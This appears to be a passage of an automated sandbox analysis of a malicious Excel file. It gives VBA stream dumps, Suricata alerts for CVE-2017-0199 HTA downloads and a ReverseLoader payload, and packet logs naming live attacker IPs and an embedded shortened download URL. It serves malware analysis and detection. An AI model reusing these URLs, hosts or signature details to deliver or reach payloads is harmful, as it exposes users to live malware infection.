                                                            Data ASCII:. . . . k M $ n . 6 N . . . . . . . . . . . . 4 . . . y . . . K . 0 . . . h . t . t . p . s . : . / . / . l . i . n . k . j . a . g . o . . . m . e . / . f . h . q . 3 . w . 8 . ? . & . p . u . p . i . l . = . g . i . g . a . n . t . i . c . & . a . n . t . e . c . h . a . m . b . e . r . = . s . u . b . s . t . a . n . t . i . a . l . & . r . u . b . = . q . u . i . c . k . & . s . i . d . e . b . o . a . r . d . = . d . i . v . e . r . g . e . n . t . & . p . e . t . t . i . c . o . a . t . . . u w O F U
                                                            Data Raw:01 00 00 02 ad 6b 4d 24 6e 0a 36 4e 00 00 00 00 00 00 00 00 00 00 00 00 34 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 30 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6c 00 69 00 6e 00 6b 00 6a 00 61 00 67 00 6f 00 2e 00 6d 00 65 00 2f 00 66 00 68 00 71 00 33 00 77 00 38 00 3f 00 26 00 70 00 75 00 70 00 69 00 6c 00 3d 00 67 00 69 00 67 00 61 00 6e 00 74 00
                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 291683
                                                            General
                                                            Stream Path:Workbook
                                                            CLSID:
                                                            File Type:Applesoft BASIC program data, first line number 16
                                                            Stream Size:291683
                                                            Entropy:7.998398408798057
                                                            Base64 Encoded:True
                                                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . ; Q * ( . . ' d . . ; . h . [ z . * . [ } . . . ) . . . . . . . . . . k . . . \\ . p . N D . . r G = . - v e H . ~ * E q 6 Z l . ~ . q ? ( . . . * g h p ` W l G % r q b z . O C R . C . . . . . . . t . . . . . k " B . . . . a . . . , . . . = . . . s e . 4 . . . & ^ [ . . C _ . K . . . . . . . . . . . . . ^ . . . . h . . . % . . . . . = . . . A a n . , 1 . 3 @ . . . Z . . . 8 \\ " . . . ? . . . . T Z . . . 4 . . . 9 1 . . . . , . . y . . 1 . c # _ . >
                                                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 bf e6 95 04 3b 51 2a 28 f2 de c3 1c bd f0 00 27 e6 64 0d 14 af aa 3b b8 18 68 02 5b 7a d2 90 2a 0f 5b f2 7d a1 83 9f 91 da 11 97 98 10 01 29 91 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 6b 92 e2 00 00 00 5c 00 70 00 8b 4e 81 44 c7 81 80 11 fe d3 72 47 3d c7 83 83 ff 2d 76 65 cd 48 8c d1 a4 7e
                                                            Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 523
                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                            CLSID:
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Stream Size:523
                                                            Entropy:5.221478009317218
                                                            Base64 Encoded:True
                                                            Data ASCII:I D = " { 4 B 5 1 7 1 8 3 - 1 0 C D - 4 4 F 9 - A B 5 B - 5 2 8 0 D 7 3 C C 5 2 6 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 7 9 7 B B D 3 B C 1 3 B C 1 3 B C
                                                            Data Raw:49 44 3d 22 7b 34 42 35 31 37 31 38 33 2d 31 30 43 44 2d 34 34 46 39 2d 41 42 35 42 2d 35 32 38 30 44 37 33 43 43 35 32 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                            Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:104
                                                            Entropy:3.0488640812019017
                                                            Base64 Encoded:False
                                                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                            Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:2644
                                                            Entropy:3.9853834971746624
                                                            Base64 Encoded:False
                                                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                            Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:553
                                                            Entropy:6.371643199016751
                                                            Base64 Encoded:True
                                                            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . ` i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                                                            Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 e5 ad 60 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-02T07:28:52.588027+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164172.245.123.1280TCP
                                                            2024-12-02T07:28:52.588083+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1172.245.123.1280192.168.2.2249164TCP
                                                            2024-12-02T07:28:57.061249+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166172.245.123.1280TCP
                                                            2024-12-02T07:28:57.061460+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1172.245.123.1280192.168.2.2249166TCP
                                                            2024-12-02T07:29:03.465056+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249167172.245.123.1280TCP
                                                            2024-12-02T07:29:15.119447+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.77443192.168.2.2249168TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 2, 2024 07:28:48.720225096 CET49163443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:48.720271111 CET44349163188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:48.720336914 CET49163443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:48.725697994 CET49163443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:48.725712061 CET44349163188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:50.015820026 CET44349163188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:50.015902996 CET49163443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:50.021039009 CET49163443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:50.021049976 CET44349163188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:50.021317959 CET44349163188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:50.021385908 CET49163443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:50.088274956 CET49163443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:50.131339073 CET44349163188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:51.230258942 CET44349163188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:51.230371952 CET44349163188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:51.230493069 CET49163443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:51.231774092 CET49163443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:51.231796980 CET44349163188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:51.246822119 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:51.366743088 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:51.366986036 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:51.367079973 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:51.487116098 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.587946892 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.588027000 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.588083029 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.588104010 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.588135958 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.588149071 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.588241100 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.588251114 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.588263035 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.588282108 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.588293076 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.588726997 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.588736057 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.588768005 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.588903904 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.588922977 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.588951111 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.588962078 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.708091021 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.708164930 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.708197117 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.708245993 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.712306023 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.712372065 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.712410927 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.712456942 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.720772028 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.720819950 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.720844984 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.720875025 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.797316074 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.797509909 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.797547102 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.797590971 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.801615953 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.801666975 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.801740885 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.801793098 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.809950113 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.810017109 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.812982082 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.813046932 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.813080072 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.813147068 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.821508884 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.821563005 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.821573019 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.821608067 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.829792023 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.829840899 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.829905033 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.829953909 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.838221073 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.838274956 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.838283062 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.838320017 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.846652985 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.846728086 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.846771955 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.846815109 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.854460001 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.854525089 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.854556084 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.854608059 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.861740112 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.861793995 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.861813068 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.861833096 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.869172096 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.869184017 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.869223118 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.876244068 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.876302958 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.876333952 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.876384020 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:52.883358955 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:52.883430958 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.007570982 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.007669926 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.007697105 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.007746935 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.008927107 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.008982897 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.009047985 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.009099007 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.013816118 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.013878107 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.013885975 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.013921022 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.018615007 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.018666029 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.018678904 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.018727064 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.023221016 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.023288012 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.023348093 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.023395061 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.027925968 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.027985096 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.028002977 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.028022051 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.032646894 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.032717943 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.032898903 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.032953024 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.037384987 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.037453890 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.037472010 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.037518978 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.042223930 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.042301893 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.043317080 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.043404102 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.046849966 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.046907902 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.046921968 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.046967030 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.051585913 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.051637888 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.051671028 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.051718950 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.056317091 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.056365013 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.056401968 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.056442976 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.061062098 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.061136961 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.061172962 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.061218977 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.065840006 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.065893888 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.065923929 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.065968990 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.070550919 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.070600986 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.070641041 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.070697069 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.075295925 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.075360060 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.075366020 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.075412035 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.080054998 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.080115080 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.080121040 CET8049164172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:53.080166101 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.167594910 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.167648077 CET4916480192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:53.709647894 CET49165443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:53.709696054 CET44349165188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:53.709753990 CET49165443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:53.722559929 CET49165443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:53.722573996 CET44349165188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:54.980230093 CET44349165188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:54.980297089 CET49165443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:54.985301018 CET49165443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:54.985311031 CET44349165188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:54.985557079 CET44349165188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:54.985600948 CET49165443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:55.053085089 CET49165443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:55.099328041 CET44349165188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:55.724355936 CET44349165188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:55.724463940 CET49165443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:55.724472046 CET44349165188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:55.724523067 CET49165443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:55.725608110 CET49165443192.168.2.22188.114.97.6
                                                            Dec 2, 2024 07:28:55.725625038 CET44349165188.114.97.6192.168.2.22
                                                            Dec 2, 2024 07:28:55.734097004 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:55.854353905 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:55.854423046 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:55.855807066 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:55.975832939 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.061110020 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.061130047 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.061136007 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.061142921 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.061147928 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.061153889 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.061160088 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.061249018 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.061460018 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.061470985 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.061482906 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.061502934 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.061517954 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.067560911 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.181638956 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.181652069 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.181798935 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.271466970 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.271522045 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.271568060 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.271835089 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.275657892 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.275707960 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.275846004 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.275888920 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.284053087 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.284101963 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.284146070 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.284183025 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.292448997 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.292496920 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.292574883 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.292633057 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.300878048 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.300925016 CET4916680192.168.2.22172.245.123.12
